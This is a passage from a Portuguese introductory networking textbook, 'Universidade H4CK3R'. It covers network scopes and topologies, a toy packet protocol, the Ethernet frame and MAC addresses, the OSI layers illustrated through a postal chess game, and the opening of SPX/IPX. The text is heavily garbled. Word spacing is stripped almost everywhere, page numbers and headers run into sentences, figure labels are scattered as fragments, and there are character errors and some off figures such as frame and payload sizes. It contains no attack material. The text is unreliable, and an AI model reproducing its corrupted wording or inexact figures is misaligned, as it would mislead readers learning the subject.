nhecerosdiferentesproblemasinerentesacadaumadassituações,entretanto,
éprimordialparaumprojetobem-sucedido.
~LAN:asfamosasredeslocais,hojechamadasdedepartamentais.Osequi-
pamentosencontram-segeograficamenteemummesmolocal,eonúmerode
máquinasépequeno.Nãohámuitosproblemasdeinterconexão.
~MAN:visacobrirumaáreaurbanacomaproximadamente30kmderaio.
Normalmenteécompostapelainterligaçãodetodasasredeslocaisdeuma
mesmaempresa,namesmaregiãometropolitana.
~WAN:redescapazesdealcançargrandesdistâncias.Seusinaléreforçado
sempreparaquenãohajaperdanosdadosduranteatransmissãodosmesmos.
Nocasoderedesprivadas,umaWANéainterligaçãodasMANsdeumamesma
instituiçãoougrupodeinstituições.Emsetratantoderedespúblicas,aWAN
maisconhecidadomundoéaInternet.
J8I
Redes1r

TopoLogias
Universidade1°ano
Quandofalamosemtopologiasdeumarede,estamosnosreferindoaolayout
lógicodamesma.Háváriasformasnasquaispodemosorganizarainterligaçãoentre
cadaumdosnósdarede(cadapontodeconexãocomaredepodeserchamadode
nó,independentementedafunçãodoequipamentorepresentadoporele).
Háquatrotopologiasquechamamosdecanônicas:ponto-a-ponto,barramento,
anelouestrela.Aescolhadatopologiaapropriadaparaumadeterminadaapli-
caçãodependedediversosfatores,sendoestabilidade,velocidade,confiabilidade
ecustoosmaisimportantes.Adistânciaentreosnóseotamanhodarede
tambémsãofatorespreponderantes.
PrincipaistopoLogias
~Ponto-a-ponto:tambémconhecidacomolinear,temcomocaracterística
adisposiçãoemsériedosequipamentos,fazendocomqueosdadospassem
portodasasestaçõesqueestiveremconectadas,masapenasareceptorapode-
ráreconhecê-Ios.
~Barramento:umaextrapolaçãodasredesponto-a-ponto.Aliás,muitas
redesponto-a-pontoutilizam-sedebarramentos.Nestemodelodeconexão,todos
oscomputadoressãoligadosemummesmobarramentofisicodedados.Ape-
sardeosdadosnãopassarempordentrodecadaumdosnós,apenasuma
máquinapode"escrever"nobarramentonumdadomomento.Todasasoutras
"escutam"erecolhemparasiosdadosdestinadosaelas.
1391
]Redes1

IUniversidadeH4CK3RI
~Anel:essatopologia
éconstituídaporumcir-
cuitofechado.Asredesco-
nhecidascomoTokenRing
(criadaspelaIBM)sãoas
maisfamosas.Quandofo-
ramcriadas,ofereciam
umataxadetransmissão
bemmaiselevadadoque
nasredeslineares,masa
adiçãodeumnúmeromui-
tograndedemáquinasno
anelcausavaproblemas
deatraso,ruídoesincro-
nização.Porissomesmo,
essatopologiacaiuem
desusopararedeslocais.
EmWANs,pelocontrário,comosãopoucosnós(umdecadaredelocalquese
querinterligar),atopologiaemaneléamaisindicada.
~Estrela:nessatopologia,todaainformaçãodevepassarobrigatoriamentepor
umacentralinteligente,quedeveconectarcadaestaçãodaredeedistribuirotráfego
paraqueumaestaçãonãoreceba,indevidamente,dadosdestinadosàsoutras.
ATENÇÃO:umaredelocalqueuseumhubnãoéconsideradacomoestrela!!!
Umhubéumdispositivoquepossui,internamente,umbarramento!Otráfego
queentraporumaportadohubédestinadoatodasasoutrasportas.Umarede
queusaswitches,entretanto,éumexemploperfeitodeconfiguraçãoemestrela.
Outroexemplosãoas
controladorasdeterminais
"burros"dosmainframese
minicomputadores.
Avantagemdasimple-
mentaçõesporestrelaéa
grandeespecializaçãodo
tráfego.Apenasdadosdes-
tinadosàquelenósãoen-
viadosaele.Oscustosde
implementaçãoeopera-
ção,entretanto,sãoeleva-
dos,eatualmenteconfigu-
raçõesemestrelasãousa-
dasmaisparainterligar
segmentosderededoque
nósindividuais.
40I
Redes1r

Universidade1°ano
Protocolos
ExtraídodoNovoDicionárioAuréliodeLínguaPortuguesa:
protocolo.[Dogr.protókollon,'primeirafolhacoladaaosrolosdepapiro,ena
qualseescreviaumresumodoconteúdodomanuscrito',pelolat.medoprotocollu
epelofr.protocole.]S.m.1.Registrodosatospúblicos.2.Registrodasaudiências
nostribunais.3.Registrodeumaconferênciaoudeliberaçãodiplomática.4.For-
mulárioreguladordeatospúblicos.5.Convençãointernacional.6.livroderegis-
trodacorrespondênciadeumafirma,repartiçãopública,etc.7.Bras.Cartãoou
papeletaemqueseanotamadataeonúmerodeordemcomquefoiregistradono
livrodeprotocolo(6)umrequerimento,equeservecomorecibo.8.Fig.Forma-
lidade,etiqueta,cerimonial.9.Inform.Protocolodecomunicação(q.v.).Proto-
colodecomunicação.10.Inform.Conjuntoderegras,padrõeseespecificações
técnicasqueregulamatransmissãodedadosentrecomputadorespormeiode
programasespecíficos,permitindoadetecçãoecorreçãodeerros;protocolode
transmissãodedados.[Tb.sedizapenasprotocolo.]Protocolodetransmissãode
dados.11.Inform.Protocolodecomunicação(q.v.).
Apalavraprotocolopossui,então,diversossignificados,tantonalíngua
portuguesaquantonalínguaaceitacomouniversal,oinglês.Trêsdossignifica-
doschamamaatenção:
3.Registrodeumaconferênciaoudeliberaçãodiplomática.
S.Convençãointernacional.
S.Fig.Formalidade,etiqueta,cerimonial.
Ovocábulotevesuaorigemnogregoparadesignarafolhaderesumodo
documento(protos =primeiro,kollon=folha),masseuusofoiamplamentedifun-
didonaesferadiplomática;emumprimeiromomento,comoosdocumentosque
registravamquaisasatitudeseosprocedimentosquedeveriamserseguidosem
encontrosouquerelascomoutrasnaçõese,posteriormente,comosinônimodes-
sesprocedimentos.Adefinição3doverbeteilustraosentidodiplomáticooriginal
dapalavra,adefmição5mostraoconceitomoderno.Emsentidofigurado,aspes-
soaspassaramaconsiderarqualquerprocedimento-padrão(sejaelediplomático
ounão)comoprotocolo-exatamenteoquenosdizadefinição8doverbete.
Quandoasprimeirasredesdecomputadorescomeçaramasairdopapel
eserexperimentadasnoslaboratóriosdetecnologia(jánadécadade50),ha-
viaanecessidadedecriarummecanismoparaquecadaequipamentoligado
nelapudessesecomunicarcomosdemais,mesmoquefossemequipamentos
diferentes.Foramcriadosentãomensagens-padrão,eseduasmáquinasquises-
semcomunicar-sedeveriamambasconhecertaismensagens.Pelasimilaridade
deidéias(eparafazerumabrincadeiracomadefmiçãodiplomática),osenge-
nheirosdeentãoapelidaramessasmensagens-padrãodeprotocolo.
Observeasdefmições9,10e11.Seprestarmosatenção,veremosquenada
maissãodoqueextrapolaçõesde5e8.Vejamos,então,algunsdosprotocolosde
redesmaisconhecidos,suasfunçõesesuasparticularidades.
141I
]Redes1

IUniversidadeH4CK3R I
Comofuncionam
Osprotocolossão,então,como"frases"queumainterfacederedetemde
dizerparapodersecomunicarcomasoutras.Comoaexpressão"asoutras"da
fraseanteriorestánoplural,devehaveralgumaformadetodasasmáquinas
conectadasnamesmaredeconseguirem,ao"ouvir"umamensagem,entender
seédestinadaaelasounão.
Aprimeiraprovidênciaqueumprotocoloderedesdevetomarédeclararde
qualprotocoloestamosfalando.Devehaver,emalgumlugarnoiníciodamensa-
gem,umindicadordeprotocolo.Lembrem-se:nemsempreexisteapenasum
protocolotrafegandopelarede,entãofaz-senecessárioidentificaratodos.
Considerandoqueumamensagem(oupacote,queéotermotécnicocorreto
paraessaentidade)emumaredeéumconjuntodedadosoriginadosemumnó
edestinadosaoutro,equeessesdadosserãotransmitidosserialmentenafor-
madebits,écoerenteafirmarqueteremos,nocabodarede,um"trem"de
pulsoselétricosseqüenciais.
Parafmsdidáticos,vamos"montar"umpacoteusandoumprotocologenéri-
coefictício,criadopornós.Jásabemosquenossamensagemtemdecomeçar
comumidentificadordeprotocolo,entãoteremosalgumacoisaassim:
ProtocotID
Umadascoisasqueoprotocolodeve definir,alémdaposição ondeestá
cadaumdosdados,éo tamanhodeles. Assim,emnossoprotocolofictício
definimosqueoidentificadordeprotocoloestánaprimeiraposição.Mas
devemosquedefinirtambémquantosbitsserãousadosparaidentificá-Io.
Vamossuporque,emnossatecnologiade redes,vãoexistirapenasquatro
protocolosdiferentes.Paraquatrovaloresdiferentes,bastamapenasdoisbits.
Então,quandopublicarmosnossasnormaseprojetarmosnossasplacasde
rede,jásabemos:osprimeirosdoisbitsdessepacoteidentificamqualproto-
coloestamosusando.
Háoutracoisaquejásabemos:qualéamáquinadestinodopacote,equala
máquinadeorigem.Cadanóemumaredepossuiumidentificadorúnicoqueo
diferenciadosdemaisnós.Esseidentificadorécomumentechamadodeende-
reço,portanto,sabemosqueéprecisoinserir,emnossopacote,quantosbits
serãodestinadosàrepresentaçãodoendereçodeorigemede destino.Nossa
tecnologiaderedes
sóvailigar16nósaomesmotempo,entãoquatrobitssão
suficientes.(Estamosconsiderandoqueoleitorsaibafazerconversãodecimal!
binário,poisseránecessário.Emcasonegativo,umsitequepodeesclarecê-Ioé
piano.dsi.uminho.pt/-joao/Computaca02lnode2.html).
1421
Redes1 [

Universidade1°ano
opacoteficariaassim:
Faltaalgumacoisa,não?Quemteriaotrabalhodeenviar,pelocorreio,um
envelopecomremetente,destinatário,oselocarimbado(que,nessecaso,iden-
tificariaoprotocolodecomunicação:osistemapostalbrasileiro)massem
umacartanointerior?Nossoprotocolotambémcarecedealgoútilparafazer.
Precisamosdefinirumespaço,dentrodamensagem,paracarregarosdados
quequeremostransmitirdonódeorigemparaodedestino.
Vamossuporquearedeparaaqualestamoscriandoesseprotocolotenha
umalimitação:otamanhodospacotesnãopodepassarde64bits.Jáusamos
doisparaoprotocolo,quatroparaoendereçodeorigememaisquatroparao
endereçodedestino.2+4+4
=10,sobram,então,54bitsparaopayload(ex-
pressãousadanomeioferroviárioparadefinirotamanhoda"cargaútil")e
demaiscampos.Umprotocolo,pormaissimplesqueseja,devepossuirum
símboloquemarqueofimdamensagem.Vamosdefinirumasequênciade
1byteparatal.Aoacaso,arbitramos11001011.Osímbolodeveseraúltima
coisaqueaparecenamensagem.Os46bitsquesobrarampodemserusados
paratransportarnossosdados.
Éclaroquepacotesmontadossegundonossosimplesprotocolosimples
carecemdediversoscontrolesmaissofisticados.Poderia,porexemplo,haver
umcamponoqualexistisseumnúmerocalculadoapartirdosbitsdetodaa
mensagem.Essenúmeroseriareca1culadopelonódestinoe,seoresultado
batessecomoqueestáguardadonocampo,indicariaqueamensagemnãofoi
corrompidaduranteaviagem.
Outrocampoútilpoderiaserummarcadordetamanhodemensagem.
Comotamanhodamensagemvariável,ajustaríamosaquantidadededadosa
transmitirnaquelemomento.Pegandocomoexemplonossoprotocolo,que
temumpayloadde46bits,vemosquetodasasmensagensterãorigorosamen-
teotamanhomáximo,mesmoqueeuqueiratransmitirapenasumbit.Comum
campocontrolandootamanhodopayload,possootimizarousodaminha
redeediminuirotráfego.
Eupoderiapassaramadrugadainteira(sim,agoraédemadrugada,eeu
tenhodeentregarocapítulotodocorrigidoamanhã...)falandosobreasinú-
meraspossibilidadesdeimplementaçãodeprotocolos.Emvezdisso,recomen-
doaoleitorqueprocurenaInternetdocumentaçãosobreteoriadeprotocolos.
Bonslivrossobreredes(comoojácitadodeAndrewTannemmbaum)também
sãoboasfontesdeinformaçõessobreoassunto.
1431
]Redes1
ProtocollDEnderecode
Endereco
(2bits)
Origem(4bits)
Destiná
(4bits)
PIDEnd.
OrigemEnd.Destino PAYLOAD(DadosÚteis) FimMsg
2bits 4bits 4bits 46bits 11001011

IUniversidadeH4CK3R I
Matrioshka3
OcampoProtocolID(ouPID)denossoprotocoloéumidentificadorque
odiferenciadosoutrosprotocolosquetrafegamnarede.
Oprotocoloénosso"primeirofIlho",vamosbatizá-IodePROTl(original,
não?).Podeserque,nomesmocabo,trafegueonossoPROTleoutrostrês,
criadosporseuscolegas:MAILl,WEBle1M!.Emqualquermomentoquese
verifique,hámensagensdessesquatroprotocolostrafegandosimultaneamen-
te.Sãomensagensindependentesequepodemexistirnomesmotempoeespa-
ço.Éfácilobservar,pelosnomesdadospelosseuscolegas,queoprotocolo
MAILlvaicarregarmensagensdecorreioeletrônico,oprotocoloWEBltrará
páginasWebparaseunavegadoreoprotocoloIMlpermitemconversasentre
programasdemensagensinstantâneas.
Emalgumassituações,queremosusarumprotocoloparatransportarpa-
cotesdeoutrosprotocolos.Umadessassituaçõeséquandoonúmerodeproto-
colosatransportarnaredeémuitogrande.Nessescasos,cria-seumprotocolo
detransporte-sendosóum,ohardwareémaisfácildeimplementar-e
encapsula-seosdemaisprotocoloscomosefossemdadosemseupayload.
Extrapolando,épossívelterváriosníveisdeencapsulamento.Cadaum
dosníveisécomumentechamadodecamadaoulayer,eépossívelextratificar
acomunicaçãodedadoscriandocamadascomfunçõesespecmcas.
6
Cabeçalho
EJ
Cabeçalho
ICabeçaLhoI I FIm ]
Osprotocolosdemaisaltonívelsão"envelopados"emoutrosdeusomais
geral.Oprocessopodeseguirindefmidamente,dependendodasnecessidades
deprojeto.Cadaumadascamadaspodetratardeexigênciasespecmcasda
rede.Porexemplo,acamadademaisbaixonívelprovavelmentecuidados
aspectoselétricosdacomunicação,jáacamadamaissuperiorofereceummeio
paraqueasmensagensdoprogramaqueestáacessandoaredesejambem
recebidasnaoutrapontadofIo.
3Bonecasrussasqueseencaixamumadentrodaoutra,damesmaformaqueascamadasdomodeloOS!
duranteoencapsulamento,iniciandosemprepelamenore"ganhandopeso"duranteoprocesso.
441
Redes1[

Universidade1°ano
Ethernet
Confuso?Talvezateoriaseja,realmente,umpoucohermética.Algunsexem-
plospráticos,entretanto,bastarãoparamostraraoleitorqueessemétodode
guardarumenvelopedentrodooutronãosóéfácildeentendercomofacilita
ascoisasparaoprojetista.
OEthernetéumprotocoloderedesdebaixonível.Elecontrolacomoos
dadostrafegamnaredelocal,tantonocontroledomeiofísico(sinaiselétricos,
impedância,etc)comonamontagemdeumquadro,chamadoEthernet,contendo
informaçõessobreendereçodeorigem,dedestinoedadosaseremtransportados.
Sevocêabrirumcaboderedeecolocarumanalisadorlógicoparaobservaroque
estátrafegando,oquevaiaparecernatelaéumquadroEthernet.Aestruturade
umquadroEthernetémuitoparecidacomadonossoprotocolofictício.Observe:
UmquadroEthernetpossuiumtamanhoentre64e1519bytes(ouseja,
entre512e12.152bits).AntesdecadaquadroEthernet,háaindaumtremde
56bits,alternadosentreOe1,chamadodepreâmbuloequeserveparasin-
cronizarasinterfacesderede4.UmquadroEthernetcompleto,incluindoo
preâmbulo,seria:
1010101010101010 10101010 10101010 10101010 10101010 10101010
7 1 6 6 2 46a1500 4
Osnúmerosabaixodecadacamporepresentamoseutamanhoembytes.
Depoisdotremdepulsosdopreâmbulo,temosoStartFrameDelimiterou
SFD.Essecampotemsempreomesmovalorbinário(10101011)eservepara,
comoonomejádiz,indicaroinício"oficial"doquadro.Ospróximosdois
campossãooendereçodeorigemeodedestinodasinterfacesderede.Esses
endereçosnãosãoconfiguradospelousuário.Pelocontrário,ofabricanteda
placaderedeinsere,noprópriohardware,umendereçoúniconomundopara
cadaplaca.OendereçoEthernetouMACadress,comocostumaserchamado,
possuiseisbyteseérepresentadopornúmerohexadecimais.Umexemplo:
00-00-lD-Cl-47-FO
Ostrêsprimeirosbytesdeterminamofabricantedaplaca.Jáostrêsúlti-
mos,afaixadeendereçosqueaquelefabricanteestáautorizadoausar.
4Paraostécnicoseengenheirosemeletrônica:notemque,comoéumaseqüênciaperfeitadezerose
uns,nadamaistemosqueumaondaquadradadefreqüênciaconstante-umclock!!!
1451
]Redes1
Cabecalho
Dadosvindosda Rodapé
Ethe'rnet
camadasuperior
Ethernet
I
PreâmbuloSFD
EnderecoEnderecoTamanho
"Payload" FCS
DestináOrigemdoQuadro

IUniversidadeH4CK3RI
Nalistaabaixo,queobviamenteestábemsimplificada,temosalgunsconjuntos
detrêsprimeirosbytesdeendereçosMAC,indicandodiferentesfabricantes:
0000OC -Cisco
0000lB -Novell
02608C-3Com
080009-Hewlett.Packard
080020-Sun.Microsystems
08005A -IBM
FaçaumaexperiênciaeverifiqueoendereçoMACdesuaplacaderede.Se
vocêestáusandoumWindowsdafamíliaWin9x,diqueemIniciar,Executare
rodeoprogramaWINIPCFG.EmumWindows2000ouXp,entrenassuas
configuraçõesderedeepeçaparaverostatusdaconexão.Cliqueemsuporte,
depoisnobotãoDetalhes.NoLinuxeemalgunsoutrosUnix,abraumterminal
euseocomandoifconfig.
VoltandoaoquadroEthernet,opróximocampoéotamanhodopayload.É
umnúmerodedoisbytes(portanto,16bits),epoderiaindicarumtamanho
entre1e65.536paraosdados.Naprática,essevalorvariade46a1500bytes.
OúltimocampodoframeEthernetéochamadoFCS,ouFrameCheckSequence.É
exatamenteaquelenúmerodeverificaçãoquediscutimosemnossoprotocolofictí-
cio.Eleégeradoemumnódeorigememftrnçãodoscamposdeendereço,tamanho
epayloadegravadonocampoFCS.Quandooquadrocheganodestino,onúmeroé
calculadodenovoecomparadocomoFCS.Seambosforemiguais,oquadroestá
bom.Sediferirem,oquadroestácorrompidoeserádescartado.
Umúltimoelemento,quenãofazpartedoquadroEthernet,éochamado
InterframeGap.Depoisqueoquadroéprocessadopelamáquinadestino,a
interfacederededeorigemdeixaarede"emsilêncio"duranteumtempopré-
definidoporhardware.Dessaforma,todasasoutrasinterfacesdaredepodem
estabilizar-seeficaràesperadeumnovoquadro.
IQuadron I
I
Quadron+1 Quadron+2
w
Interframe
Gap
Interframe
Gap
OprotocoloEthernet,sozinho,dariaumlivrointeiro.Nãoserápreciso,para
nossospropósitos,dissecá-Iomaisdoqueapresentamosaqui.Parauma
escovaçãomaiordebits,lembre-sedequeaInternetésuaamiga.
Comooleitorveráaseguir,apresentaremosummodelodereferênciaparaa
criaçãodeprotocolos.OEthemetencaixa-senascamadas1e2dessemodelo
dereferência.Podeparecerestranhoter"adiantadooexpediente",falandoso-
breEthemetantesdetudo,masprecisávamosdeumexemplopráticodepro-
tocolo.Comosepodever,estátudodentrodoprojetopedagógico;-)
1461
Redes1I

Universidade1°ano
oModelo051
PodemosdizerqueomodelodereferênciaOSI(OpenSystemsInterconnection)
nasceudanecessidadedecriarumprotocoloqueconseguissesecomunicar
entreredesdiferentes.Asredesantigasdecomputadorespossuíamprotocolos
proprietários.SeaempresaXimplantasseumarede,estasópoderiasecomuni-
careserexpandidacomoutrasredeseequipamentosconstruídospelamesma
empresa.Atecnologiautilizadaeradeconhecimentodeapenasumfabricante,
nãoerapossíveladquirirohardwarecomumaempresaeinstalararedecom
outra.Osclientesficavamdemãosatadas,poisnãohaviaconcorrênciaenem
sempreofabricanteproporcionavaamelhorsolução.
Comoopróprionomediz,oOSIéummodelodereferência,nãoumprotoco-
lo.Vamostentarilustrardeumamaneirabemsimples:pensenumprocessador
detextos.OMicrosoftWord,porexemplo.Existemdiversosmodelosdedocu-
mentos(chamadostemplates)apartirdosquaispodemoscriarnossasprópri-
ascartas,folhasde.rostodefaxoumemorandos.Imagineomodelodereferên-
ciaOSIcomoumtemplateparacriarprotocolosderede.Fácil,não?
OmodelofoidesenvolvidopelaISO(lntemationalStandardsOrganization),
etomou-seumpadrãoparaqueosfabricantespassassemadesenvolverseus
protocolosapartirdessemodelo.Aindaassim,vocêpodenotarqueosproto-
colosexistentesnãoseguemàriscaessasespecificações,algunsporserem
maisantigosqueelas,outrosporatingiremaobjetivostécnicosespecíficos,e
unspoucosporpuraarrogânciacorporativa.
Camadas
omodeloOSIéformadoporsetecamadas,cadaumacomumafunçãodiferen-
te.Ascamadascriamumenvelopecomosdadosdacamadasuperior,incluem
seuspróprioscabeçalhoseentregamissoparaacamadaimediatamenteinferior.
Quandoopacotecheganacamadadenívelmaisbaixo,estáprontoparaser
transmitido.Ascamadassãoorganizadassegundoestemodelo:
1471
]Redes1
7
I
Aplicação
6 Apresentação
5ISessão
4ITransporte
3 Rede
2 Enlace
1 Física

IUniversidadeH4CK3R I
ModeloOSIrepresentadopelasMatrioshkas
1 2 3 4 5 6 7
QuandoumpacoteéenviadodeumdispositivoquesegueomodeloOSI
paraoutro,ascamadasdoremetentesecomunicamapenascomascamadas
correspondentesnoreceptor.Issosignificaqueascamadasidentificamosca-
beçalhosequivalentesqueforamincluídosnoprocessodeencapsulamento,
fazendoassimcomqueopróximonívelnãopreciselidarcomasinformações
dosníveisanteriores.Trocandoemmiúdos,acamada4nãotemamínimaidéia
doqueascamadas3,2e1fazemcomosdados.Tudooqueelasabeéquefez
umenvelopeeoentregouàcamada3.Lánooutroladodaconexão,norecep-
tor,acamada3entregaráoenvelopefechadoparaqueacamada4abra.Po-
demterhavidomudançasdeprotocolonascamadasinferiores,fragmentação
depacotes,trocadeordem,nãoimporta.Acamada4sóquersaberoqueestá
emseuenvelope.Issovaleparatodasascamadasetomaofuncionamentode
cadaumaindependentedasoutras.
Comodissemos,cadacamadapossuiumafunçãoespecífica.Setomarmos
comopontodepartidaquecadaumadelasrepresenta,narealidade,algum
softwarequedesempenhaasfunçõesdescritas(comexceçãodacamada1,que
éimplementaçãodehardware),veremosqueomodeloproposto,emvezde
serabstrato,éatébempalpável.
7-CamadadeAplicação
Acamadadeaplicaçãoé,comoonomejádiz,opróprioaplicativo.Emoutras
palavras,éoprogramaquevocêestáusando.Porexemplo,seunavegadorWeb
estánacamadadeaplicação,efaladiretamentecomoservidorWebqueestálá
naoutrapontadaconexão.Há,portanto,uma"conversaadois"entreospro-
gramas.Nãoé,verdadeiramente,partedarede.Docontrário,essacamadare-
presentatodososprogramasquequeremacessararedeenãosabemcomo
fazê-Io.Aúnicaformadeosprogramasqueusamosconseguiremsecomunicar
comoutrosprogramasemoutrasmáquinasé"falando"comacamada6.
1481
Redes1r

Universidade1°ano
6
-CamadadeApresentação
Chamada,pormuitos,de"acamadasemfunção"ou"acamadainútil".Na
teoria,serveparaprepararosdadosnodomíniolocalecolocá-Iosemumfor-
matocompatívelcomprocedimentosdetransporte.Nocaminhoinverso,pa-
dronizaosdiferentestiposdedadosdeumaformaquequalqueraplicação
possaserescritaparausararede,independentedasimplementaçõesdascinco
camadasinferiores.Doisexemplosdeserviçosexecutadosnessacamadasãoa
criptografiaeacompressãodedados.Naprática,essafunçãoétrivialeé
implementadanaprópriaaplicação.
5-CamadadeSessão
Acamadadesessãoéresponsávelpeloestabelecimentodeconexãoentre
doiscomputadoresqueestãosecomunicando.Elacontrolaodiálogoentreas
aplicaçõesnossistemaslocaleremoto.Tambémépossívelagrupardadosem
blocosemarcá-Iosdepoisdeenviados.Casohajaumainterrupçãonaconexão,
apróximasessãopoderárecomeçarapartirdofundoúltimoblocoenviado.
4-CamadadeTransporte
Acamadadetransportefornecemeiosparaqueosnóslocaleremotopos-
samtrocardados.Usandoumaanalogiaumpoucoimprecisa,osprogramasda
camada4montamum"cano"entreacamada5localeacamada5remota.Seos
softwaresdecamada5deambasasmáquinasolharempelocano,verão,do
outrolado,seucompanheiro.Éatravésdesseencanamentodisponibilizadopela
camada5quetodaa"mágica"dascamadasanterioresacontece.
3-CamadadeRede
Atéagora,estávamosnoâmbitoexclusivodosoftware.Ascamadasante-
riorescomunicam-sediretamentecomoprogramacorrespondentedasmá-
quinasremotas.Acamada3,poroutrolado,conheceatopologiaeadistri-
buiçãodaredeesabecomoencontrarumamáquinaemespecialnomeio
daselvadeendereçosecaminhos.Acamadaderedenãoéorientadaà
conexãocomoacamadadetransporte.Ospacotessãoenviadossemquese
saibasevãochegarounão.Comoaconexãoéestabelecidanacamadaime-
diatamentesuperior(que,porsinal,estáencapsuladanesta),issonãochega
aserumproblema.
2-CamadadeEnlace
Acamadadeenlaceéresponsávelpelacomunicaçãodiretaentreduasinterfaces
numamesmarede.Nãotemconhecimentodeoutrasredesalémdasua,função
dacamadasuperior.Poroutrolado,éacamadaque,narededeorigemenade
destino,efetivamenterecolheeentregaopacoteàinterfacederedecorreta.
Controleedetecçãodeerrosfazempartedoseumétier.
1491
]Redes1

IUniversidadeH4CK3RI
1-CamadaFísica
Comoopróprionomeindica,éaresponsávelpeloenviodosquadrosparao
meiofisico.AconversãoéfeitaapartirdosOselsdoquadro(sistemabinário)
eadaptadaparaomeio,nocasodeummeioelétrico,sãotransformadosem
sinaiselétricos,nummeioótico,sinaisluminososeassimpordiante.
UmexempLoprático
Paraentendermelhor,umapequenaalegoria:umjogo,porcorrespondên-
cia,entredoisenxadristas,umemTeresinaeoutroemGoiânia5.Osenxadristas
sãoosusuários.Ojogoemsi(tabuleiro,peçaseregras)éaaplicação(camada
7).Asjogadassãoregistradasemnotaçãotabular(porexemplo,omovimento
deumcavalopoderiaserB3C5)eescritasemfolhasdepapel-essaéaforma
deapresentaçãodojogo(camada6).Notequenãobastasimplesmentecolo-
carumapapeletanoenvelopecomanotaçãodajogada.Édebomtomescre-
verumacartacompleta,comdata,saudaçãoeassinatura,perguntarcomovaia
família,otrabalho,férias,etc.paraquesecrieumvínculoíntimoentreosdois.
Mascomoenviarajogadaaooutroenxadrista?Bem,énecessárioestabe-
lecerumasessão(camada5)decomunicação.Emnossocaso,arequisiçãoda
sessãoérepresentadapelosserviçosdaECT.Colocamosacartanoenvelope,
endereçamos(nãoesqueçaoCEP!),selamosecolocamosnacaixadecorreio.
Dooutrolado,nossocolegavaiabriracartaeestabelecerasessão.
AECTéresponsávelpelotransportedenossacarta(camada4).Issosig-
nificacriarmeiosparaqueumaconexãoentreosdoisenxadristasseja
estabelecida.Quandocolocamosacartanacaixadecorreio,esperamosque,de
algumjeito,elachegueàsmãosdodestinatário.Osmecanismosusadospara
talnãonosinteressam.
AECTseparaascartasporregião,depoisporestado,depoisporcidade,
depoisporlogradouro.Umavezseparadas,montapacotesdecartasdestina-
dasacadalogradouroeosenviaparalá.Utiliza-se,paratal,umarededevias
rodoviárias,ferroviáriaseaeronáuticas(camada3)eumexércitodecarteiros
paraentregarascartas.
Oscaminhões,ônibus,aviões,motocicletaseasbolsasdoscarteirossãoos
elementosquetransportamospacotesdecartasdentrodeumamesmarede
viária.Oscaminhõessóandamnasestradas,osaviõessóvoam,oscarteirossó
andamnascidades.Nenhumdelesconheceosdetalhesdetodaarotadascar-
tas,sabemapenascomoentregarascartaslocalmente.Sãonossacamada2.
Noteque,casosejaprecisotrocardetipoderede(porexemplo,sairde
umaviãoeentrarnumônibus),nossascartassãotratadasporfuncionáriosdos
correiosquetrabalhamematividadesprópriasdacamada3.Elessabemmapear
entreasredes.Ospilotosdosaviões,porexemplo,nãoentendemnadadisso.
5ApesardasfacilidadesdaInternetedaTelefonia,umjogoporcartasémaisromânticoemaisbarato...
150I
Redes1[

Universidade,0ano
Osaviõesutilizam-sedoarparasustentaçãoenavegação.Jáoscami-
nhõestrafegampelaestradas.Oscarteirosandamporcadalugarquemerece-
riammuitasmedalhas(nemovento,nemachuva...).Oar,asestradaseos
morrossãonossosmeiosfísicos,porondeéfeitootransportedetudooque
descrevemosnascamadassuperiores.
Ufa!DescrevemospelomodeloOSI,comumexemplonão-tecnológico
(tantoocorreioquantooxadrezexistemhámilharesdeanos...),ummétodo
detransportedemensagensentreduasaplicações.Hácoisasbeminteressan-
tesaseobservarnesseexemplo,oquecomprovatodasasteoriasenvolvidas
nomodelodereferência.
~Encapsulamento:Ajogadafoiencapsuladananotaçãotabular,quefoi
encapsuladanacarta,queporsuavezfoiencapsuladaemumenvelope,que
estabeleceuumasessãodecomunicaçãousandoosprotocolosdeclassificação
etransportedosCorreios,queenviapacotesdecartassegundorotasespecífi-
cas,queparaissotrafegouemveículosquerodavamexclusivamentedentrodo
meiofísicoespecíficoparaosquaisforamfeitos.
~Paridade:Cadaumadascamadaspossuiumemissoreumreceptor.Opesso-
aldeclassificaçãoeenvio(camada3)"conversa"comomesmopessoaldaoutra
localidade,usandoosrecursosdacamadainferior(ocaminhão,porexemplo).
~Conexão:Apartirdacamadaquatro,vemosquetodososprocedimentos
precisaramqueoemissoreoreceptorentrememnegociação.Dacamada3
parabaixo,ascartassãotransportadasindiscriminadamente,semseimportar
sehaveráalguémlápararecebê-Ias.Nãochegaaserumproblema:seapenas
umadascamadasestabelecerumcanaldeconexãopermanente,asoutrasca-
madaspodemtrafegar"connection1ess" .
~Independência:Ascamadassãocompletamenteindependentes.Acama-
da4-ossetoresderecebimentoeentregadecartas-nãoprecisamsaber
quaisrotasopessoaldacamadatrês-ossetoresderedesdetransporte-
utilizou.Essepessoaltratadecoordenarosdiferentesmeiosdetransporte -
nossacamada2-,masnãosepreocupacomosproblemasinerentesaotrans-
porte-qualcaminhãodesignar,combustível,motorista,problemascomgre-
ves,sindicato...Jáomotorista,alémdenãosaberporquaisoutrosmeiosde
transporteascartastrafegaram,muitomenosoconteúdodecadacartaindivi-
dual,preocupa-seapenasemgerenciarosproblemasinerentesaoseutraba-
lho:seguirarotadesignadapelopessoaldacamadatrês,operandoocaminhão
deacordocomasleisdetrânsito,desviandodeburacos,atravessandoenchen-
tes,etc.Nenhumdosenxadristas(camada7)sequerseincomodaemconhecer
qualquerumadessaspartesdoprocesso.Paraeles,oquevaleémexerocavalo
deacordocomB3C5.
I51I
IRedes1

IUniversidadeH4CK3R I
SPX!IPX
oSequencedPacketExchange/lnternetPacketExchangeéoprotocolouti-
lizadopelaredeNetwaredaNovell.Implementaascamadas3e4domodelode
referênciaOSI,eutiliza,comoprotocolodecamada2,exclusivamenteoEthernet.
Pormuitosanos,NetwareeEthernetforamconsideradossinônimos.Possuem
diversassemelhançascomoTCP/lP.Jáforamosprotocolosmaispopulares,
mas,sendooTCP/lPabasedaInternet,acabaramcaindoemdesuso.
~IPX-OIPXseriaoequivalenteaoprotocoloderedes.Éuma
implementaçãomuitovolumosaecheiaderecursos.Temalgumascaracterís-
ticasvantajosascomoadetecçãodeendereçosMACeatribuiçãoautomática
deendereçoIPX,aocontráriodeoutrosprotocoloscomooIp,quefazem
comqueousuáriotenhadeatribuirmanualmenteumendereçopara.cada
interfaceouconfigurarumserviçoexternoqueautomatizeatarefa.
~SPX-DamesmaformaqueoIPX,oSPXtemcorrespondênciacomo
protocoloOSIdetransporte.Umadascaracterísticasmaisimportantesdes-
saimplementaçãoéqueoSPXtemdereceberaconfirmaçãodospacotes
